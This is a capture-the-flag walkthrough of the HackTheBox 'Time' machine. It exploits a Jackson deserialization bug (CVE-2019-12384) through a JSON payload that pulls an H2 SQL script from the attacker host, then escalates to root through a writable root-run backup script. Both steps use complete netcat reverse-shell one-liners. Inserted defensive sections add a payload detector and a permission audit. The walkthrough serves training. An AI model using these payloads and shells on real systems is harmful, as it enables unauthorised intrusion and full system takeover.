Time HackTheBox WalkThrough

This is a walkthrough of the Time HackTheBox machine. In this writeup, I demonstrate step by step how I rooted the Time HTB machine. Before starting, a few facts about this machine: it is a Linux box with IP address 10.10.10.214, and its maker assigned it medium difficulty.

First of all, connect your PC to the VPN and confirm connectivity with the Time machine by pinging its IP, 10.10.10.214. If all goes well, it is time to start hacking. As usual, I started by scanning the machine. Scanning gives us an idea of how to proceed further: it helps in banner grabbing the services running on different ports, and sometimes it helps in vulnerability scanning as well. I used nmap for scanning, and the result is given below:

Scanning

$ nmap -sC -sV -oN time.nmap 10.10.10.214

Performing nmap scan during Time HackTheBox WalkThrough

Nmap revealed that ports 22 and 80 are open, with OpenSSH running on port 22 and an Apache2 web server on port 80. Since Apache2 is running on port 80, there must be a website hosted on this server, which can be accessed at http://10.10.10.214:80 or simply http://10.10.10.214 . On going to this URL, I found that the website is for beautifying and validating JSON (JavaScript Object Notation).

JSON beautifier web page running on port 80 of time hackthebox

I tried to validate and beautify some fake JSON from the internet and it worked fine. But when I tried to inject an XSS payload (just for testing), it gave a validation error. The validation error exposes that this website uses the Jackson library for JSON deserialization (deserialization is basically converting JSON code back to objects to store them on disk).

As soon as I learned about the Jackson library, I googled for Jackson library vulnerabilities and got this link and then this CVE-2019-12384 on the very first page. According to this article, applications that use the Jackson library for JSON deserialization were affected by a deserialization vulnerability where an attacker could control the class that is to be deserialized. You should read the above blog to learn how this vulnerability actually works and how to reproduce it. Another PoC of this vulnerability can be found on GitHub.

Getting User Shell

After finding the steps on GitHub, I did the following things to exploit this vulnerability.

1. Created a file named inject.sql and put the following content into it.

CREATE ALIAS SHELLEXEC AS $$ String shellexec(String cmd) throws java.io.IOException {String[] command = {"bash", "-c", cmd};java.util.Scanner s = new java.util.Scanner(Runtime.getRuntime().exec(command).getInputStream()).useDelimiter("\\A");return s.hasNext() ? s.next() : ""; }$$;CALL SHELLEXEC('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.10 1234 >/tmp/f')

$ cat inject.sql

Inject.sql code snippet taken from the GitHub page of the exploit

You should replace the IP address in the SHELLEXEC() call on the last line of the above code.

2. Started a Python HTTP server to host this file.

3. Started a netcat listener on port 1234 in another window.

4. Entered the following code in the input field of the website after choosing the option Validate(beta), and then clicked the PROCESS button.

["ch.qos.logback.core.db.DriverManagerConnectionSource",{"url": "jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http:\/\/10.10.14.10:80\/inject.sql'"}]

The above code is in its beautified form; you can also use its raw form for getting a reverse shell.
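A pre-deserialization check for the request shape used in step 4, as an added example that is not part of the original writeup: it walks parsed JSON and flags Jackson type ids outside an allowlist and H2 JDBC URLs that carry INIT=RUNSCRIPT. The allowlisted class name com.example.time.Document, the BENIGN sample and the function names are assumptions made for illustration.

```python
import json
import re

# Assumption: the only class this hypothetical application accepts as a type id.
ALLOWED_TYPES = {"com.example.time.Document"}
# Java fully qualified class name: dotted identifiers with at least one dot.
FQCN = re.compile(r"^(?:[A-Za-z_$][\w$]*\.)+[A-Za-z_$][\w$]*$")
# H2 JDBC URL that runs a script on connect, as in the request shown above.
H2_INIT = re.compile(r"jdbc:h2:.*\bINIT\s*=\s*RUNSCRIPT\b", re.I | re.S)

# Sample inputs: the first is the request body from this page, the second is constructed.
PAGE_PAYLOAD = r"""["ch.qos.logback.core.db.DriverManagerConnectionSource",{"url": "jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http:\/\/10.10.14.10:80\/inject.sql'"}]"""
BENIGN = '{"name": "time", "tags": ["a.b", "c"], "doc": ["com.example.time.Document", {"t": 1}]}'


def find_suspicious(node, path="$"):
    """Walk parsed JSON and return a list of (json_path, reason) findings."""
    findings = []
    if isinstance(node, list):
        # Jackson default typing, wrapper-array form: ["pkg.Class", {...fields...}]
        if (len(node) == 2 and isinstance(node[0], str) and isinstance(node[1], dict)
                and FQCN.match(node[0]) and node[0] not in ALLOWED_TYPES):
            findings.append((path, "type id not in allowlist: " + node[0]))
        for i, item in enumerate(node):
            findings += find_suspicious(item, f"{path}[{i}]")
    elif isinstance(node, dict):
        for key, value in node.items():
            # Property form of the same mechanism: {"@class": "pkg.Class", ...}
            if key == "@class" and isinstance(value, str) and value not in ALLOWED_TYPES:
                findings.append((f"{path}.{key}", "type id not in allowlist: " + value))
            findings += find_suspicious(value, f"{path}.{key}")
    elif isinstance(node, str) and H2_INIT.search(node):
        findings.append((path, "H2 JDBC URL with INIT=RUNSCRIPT"))
    return findings


def inspect_body(body):
    """Return findings for one request body; unparseable input is reported too."""
    try:
        return find_suspicious(json.loads(body))
    except json.JSONDecodeError:
        return [("$", "not valid JSON")]


if __name__ == "__main__":
    for name, body in (("page payload", PAGE_PAYLOAD), ("benign", BENIGN)):
        print(name, inspect_body(body))
```

A filter like this is a detection aid for logs or a request gateway; the underlying fix is an updated jackson-databind with default typing left disabled for untrusted input.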

Start Python HttpServer

$ sudo python3 -m http.server 80

Start Netcat Listener

$ nc -nvlp 1234

$ whoami && id

Getting User Shell in Time HackTheBox WalkThrough

We got a user shell. Let us upgrade it to a fully qualified Linux shell so that we can execute more advanced Linux commands through it.

Upgrading Shell

$ python3 -c 'import pty;pty.spawn("/bin/bash")'

$ export TERM=xterm

$ CTRL+Z //To background the shell

$ stty raw -echo

$ fg //To foreground the shell and press two times enter

Upgrading shell to fully qualified Linux shell

Capture User Flag

$ cat /home/pericles/user.txt

User flag captured during Time HackTheBox WalkThrough

Privilege Escalation

To escalate privileges to root, we first have to find a privilege escalation vector. For this I ran linpeas.sh (a post-exploitation enumeration script) on the Time machine. It gives us information on all potential vectors that can be used to escalate privileges to root.

Finding PrivEsc Vector

Linpeas found a script timer_backup.sh inside the directory /usr/bin/ which is writeable by normal users.

Finding privilege escalation vector using Linpeas.sh in time htb

Confirmed it by checking its permissions, to rule out a false positive.

$ ls -la /usr/bin/timer_backup.sh

Checking file permission of file timer_backup.sh file in time hackthebox machine

Its permissions are rwx (readable, writeable and executable) for user pericles. But when I tried to execute this script, it gave me permission denied. One thing is clear: this script can only be executed by the root user. So, if the root user can execute this script, all the content inside this file is executed with root privileges. If we introduce our reverse shell payload into this file, it will also be executed with root privileges and we can get a root shell. I did the same and easily got a root shell. So here our PrivEsc vector is privilege escalation due to exploitation of an unwanted file permission given to a normal user.
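The misconfiguration described above can be checked for directly. The following audit is an added example, not part of the original writeup: given the files that root executes, it reports any that a non-root user owns or can write to. The function name and the trusted_uids parameter are assumptions, and the list of root-executed paths has to be supplied by the operator, since the page does not show how the script is scheduled.

```python
import os
import stat


def audit_root_executed(paths, trusted_uids=(0,)):
    """Return (path, reason) findings for files a privileged job executes.

    paths: scripts or binaries that root runs (assumption: collected by hand
    from cron entries or service definitions; the page does not show which).
    """
    findings = []
    for path in paths:
        # Check the file and the directory holding it: write access to the
        # directory lets a user replace the file even if the file is locked down.
        for target in (path, os.path.dirname(os.path.abspath(path))):
            try:
                st = os.stat(target)
            except OSError as exc:
                findings.append((target, "cannot stat: " + str(exc.strerror)))
                continue
            if st.st_uid not in trusted_uids:
                findings.append((target, f"owner uid {st.st_uid} is not trusted"))
            if st.st_mode & stat.S_IWGRP:
                findings.append((target, f"writable by group gid {st.st_gid}"))
            if st.st_mode & stat.S_IWOTH:
                findings.append((target, "writable by everyone"))
    return findings


if __name__ == "__main__":
    # Path taken from this page, which reports rwx on it for user pericles.
    for target, reason in audit_root_executed(["/usr/bin/timer_backup.sh"]):
        print(f"{target}: {reason}")
```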

Getting Root Shell

To get a root shell I did the following things:

1. Started a netcat listener in one window.

2. Wrote our reverse shell payload into the file timer_backup.sh (since a normal user can modify this file).

This script is executed by root at a regular interval (I think at an interval of 5-10 sec; I don't know exactly and am just guessing, but in my case the gap was about 5-10 sec). When it executes the next time, it will also execute our reverse shell code and we will get a root shell.

On Kali Machine

$ nc -nvlp 4321

On Time Machine

$ echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.10 4321 >/tmp/f' >>/usr/bin/timer_backup.sh

Privilege escalation in Time HackTheBox WalkThrough

We are root now. Let's capture the root flag.

Capture Root Flag

$ cat /root/root.txt

Root flag captured during Time HackTheBox WalkThrough

This was how I rooted the Time HackTheBox machine. I learnt a lot during this challenge. I hope you have also learnt some new things. Thanks for reading this walkthrough. Share your experience in the comment section. If you want to give any suggestions about the writeup, feel free to write to us at [email protected]. Check out our latest walkthroughs at https://ethicalhacs.com/ .

Deepak Kumar Maurya

Hi everyone, I am Deepak Kumar Maurya, creator of Ethicalhacs.com. I am an InfoSec Consultant by day and a Bug Bounty Hunter & CTF player at night. Sometimes I write walkthroughs and other cyber security articles here. You can connect with me at https://www.linkedin.com/in/deepakdkm/